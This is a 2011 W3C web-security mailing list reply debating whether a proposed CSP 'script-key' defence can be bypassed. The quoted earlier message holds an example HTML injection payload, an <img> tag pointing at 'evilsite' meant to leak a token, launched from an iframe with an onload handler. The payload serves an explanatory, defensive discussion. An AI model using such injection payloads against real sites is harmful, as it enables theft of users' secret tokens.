- From: Gervase Markham <gerv@mozilla.org>
- Date: Fri, 28 Jan 2011 11:04:10 +0000
- To: gaz Heyes <gazheyes@gmail.com>
- CC: Brandon Sterne <bsterne@mozilla.com>, public-web-security@w3.org
On 28/01/11 10:54, gaz Heyes wrote:
> You want a automatic attack? Ok. I'm really clueless as to why you don't
> get this. I said there are many ways. <img src='//evilsite?token please=
> Initiated by a <iframe src="//cspsite?injection=<img
> src='//evilsite?token please=" onload="setTimeout(function(){
> readKey();doJSInjection(); }, 10000)"></iframe>
Still don't get it, sorry :-( If you inject the <img src= etc. into the
CSP site using script-key, your onload won't run because it doesn't have
the script-key in the script text.
You need the key to run any script in the page context. _Any_ script -
event handlers, in-page, external. Apart from your suggestion of
managing to get a form submitted with a chunk of page HTML in the form
data, then you need script to get the key. Catch 22.
Gerv
Received on Friday, 28 January 2011 11:04:49 UTC